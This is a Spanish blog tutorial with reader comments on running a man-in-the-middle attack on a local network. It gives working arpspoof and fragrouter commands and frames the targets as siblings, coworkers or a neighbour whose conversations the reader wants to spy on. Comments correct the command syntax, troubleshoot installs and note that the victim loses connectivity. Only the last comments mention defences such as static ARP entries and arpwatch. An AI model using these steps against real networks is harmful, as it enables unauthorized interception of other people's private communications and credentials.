Puede que a algunos el ataque Man in the middle (o MitM) no les diga mucho pero es una de las herramientas básicas a la hora de conocer la información que fluye a lo largo y ancho de nuestra red local (o intranet).
A grosso modo lo que pretendemos es hacernos pasar por el router de nuestra red (por el que pasan todas las comunicaciones tanto externas como internas) y de este modo capturar las conversaciones que nuestros hermanos, compañeros de trabajo (si el administrador de red de la oficina es lo suficientemente malo como para no tomar las medidas oportunas) o el famoso vecino que nos robó la wifi (al no saber las consecuencias que esto le traería) están manteniendo.
Ya sabemos cómo obtener sus contraseñas, veamos ahora a qué dedican su tiempo libre y de qué hablan 🙂
Aunque pueda parecer extremadamente complejo no lo es en absoluto (esa es la ventaja de Internet: nos permite aprender a hacer cosas que antes ni habíamos soñado) bastando con lanzar un par de comandos.
Software necesario
En principio sólo necesitamos:
- dsniff nos permitirá dirigir a nuestra máquina los paquetes direccionados al router
- fragrouter para habilitar el enrutado (ip forwarding)
Para instalarlos sólo debemos visitar Synaptic o lanzar desde la terminal
apt-get install dsniff fragrouter
Puesta en marcha
Lanzamos en una terminal
sudo arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER
Donde
- TARJETA_RED es la que utilizamos para conectarnos a la red (eth0, eth1, wlan0, …)
- IP_VICTIMA la del equipo cuyas conversaciones queremos escuchar (puedes ver los equipos conectados actualmente a la red siguiendo los pasos que explicamos en su momento para detectar intrusos en la red)
- IP_ROUTER puedes obtenerlo con un ifconfig en la terminal (recuerda que es la puerta de enlace)
En otra terminal lanza
fragrouter -B1
Capturar información de red
A partir de este momento todos los paquetes que envíe el equipo que estamos espiando (IP_VICTIMA) pasarán por nuestro equipo.
Basta utilizar cualquiera de las herramientas de sniffing: Wireshark, Ettercap, … para capturarlos y seleccionar aquellos que nos resulten de interés.
Esta receta se centra en cómo perpetrar el ataque en Linux, en próximas entregas, y en función de la aceptación del mismo explicaremos, entre otros:
- cómo capturar los correos electrónicos
- sesiones de chat
- páginas web visitadas
- etc…
Espero que el artículo haya sido de interés para el «piratilla» que todos llevamos dentro. Como colofón recordaros que la privacidad en las conversaciones es algo básico: ¡ojo con el uso que dais a esta información!
Muy bueno! Sinceramente, me parace genial conocer las técnicas de defensa/ataque y como podemos saber a que atenernos.
Sabia de estas técnicas pero nunca me imaginé lo sencillo que sería. 😉
Tremendo, ya estoy por quitar el Wifi de casa 😉
Me gustaMe gusta
No lo quites Rafa… protégete.
Ahora que empiezan a verse los puntos negativos de dicha tecnología puede que sea el momento de ir tratando cómo solucionar los problemas para estar mas seguros
Me gustaMe gusta
Creo recordar que era asi:
arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER GETAWAY
Y en el frag se necesita la interfaz:
fragrouter -i INTERFAZ -B1
Saludos!
Me gustaMe gusta
THX, ahora si me va!!!
Me gustaMe gusta
Hola Alberto
por no liar al personal, indicar que la única variación con lo que aparece en el artículo es el uso del parámetro -i INTERFAZ que en la documentación aparece como opcional (si no se indica se toma por defecto la tarjeta de red activa)
Si alguien tiene problemas que no dude en dar un toque y lo solucionamos
Salu2 a todos
Me gustaMe gusta
Sencillo, corto y preciso, asi es este articulo, me gusta mucho todas las entradas de este blog.
Soy estudiante de sistemas y todo esto me fascina, pero sobre todo me ayuda mucho, porque probablemente estoy decidido a especializarme en todo esto.
Sin embargo tengo una pregunta.
Despues de hacer un poisonamiento (^_^je) al equipo B para que todo su trafico saliente pase primero por el nuestro y luego al switch. ¿Que pasaria si mi equipo no esta encendido?, es decir, en ese caso ¿el equipo B sufriria un DoS?
Me gustaMe gusta
Interesante planteamiento @Noxes.
Imagino que el equipo quedaría sin poder navegar y el usuario se vería obligado a reparar la conexión a Internet. Pero sólo son imaginaciones mías. Lo más adecuado sería hacer una prueba y ver cómo responde el equipo B, ¿no te parece? 😉
Me gustaMe gusta
Para cuando??
«Esta receta se centra en cómo perpetrar el ataque en Linux, en próximas entregas, y en función de la aceptación del mismo explicaremos, entre otros»
Me gustaMe gusta
Hola, hice todo lo que pone, pero al ordenador victima lo dejo sin internet. que pasa???
Me gustaMe gusta
¿Has probado lo siguiente?
Salu2
Me gustaMe gusta
Buenas
Lo he probado y sin problemas, una herramienta muy potente, el unico problema que veo es que al terminar el ataque se queda la victima sin red, hasta que no la repare o caduque la entrada de arp, con el consiguiente problema de que no es trasparente, hay alguna manera de cambiar las entrada de arp de la victima a la situación original.
Un saludo y Gracias
Me gustaMe gusta
Bueno, aquí algunos dicen que les parece bien que digas formas de ataque / defensa pero solo veo métodos de ataque, estaría bien que dijeras como nos podríamos «proteger» de uno de esos ataques 😛
Me gustaMe gusta
a mi me da este error al instalar fragroute… exactamente en el sudo make.
/home/ubuntu/Escritorio/fragroute-1.2/fragroute.c:151: undefined reference to `event_gotsig’
fragroute.o: In function `fragroute_init’:
/home/ubuntu/Escritorio/fragroute-1.2/fragroute.c:181: undefined reference to `event_sigcb’
collect2: ld returned 1 exit status
make[2]: *** [fragroute] Error 1
make[2]: se sale del directorio `/home/ubuntu/Escritorio/fragroute-1.2′
make[1]: *** [all-recursive] Error 1
make[1]: se sale del directorio `/home/ubuntu/Escritorio/fragroute-1.2′
make: *** [all-recursive-am] Error 2
Me gustaMe gusta
Cómo solucionaste el problema? a mi me sale lo mismo
Me gustaMe gusta
hola he estado intentando instalar el fragroute pero no lo consigo, cuando intento instalarlo con el comando sudo apt-get install fragroute me pone que no encuentra el paquete.¿como podria instalarlo? ¿de donde me podria descargar el paquete para instalarlo? un saludo y gracias.
Me gustaMe gusta
Prueba con sudo apt-get install fragroute (observa que he quitado la r del final)
Puede que haya cometido un typo y hasta ahora no lo haya detectado nadie (espero confirmación de cómo te ha ido)
Gracias y un saludo @velaTorre
Me gustaMe gusta
He probado ha instalar fragroute con apt-get pero no hay manera, ni con r al final ni sin ella, alguien que lo tenga instalado q pueda indicar como lo ha echo.
Me gustaMe gusta
me entra una duda en ettercap uno coloca stop Arp poisiong y devuelve al estado normal la mac de la victima. Mi duda es como parar este ataque ?
Me gustaMe gusta
¿Te refieres a parar el ataque en la víctima?
Para evitar este tipo de ataque lo mejor es utilizar (en la víctima) tablas arp estáticas. Así evitaremos el envenenamiento de la tabla arp:
arp -s
También se pueden utilizar programas como ‘arpwatch’ para monitorizar las entradas en la tabla arp.
Un saludo!
Me gustaMe gusta
umm.. no ha salido la sintaxis del comando arp:
arp -s [IP del Router] [Mac del router]
Me gustaMe gusta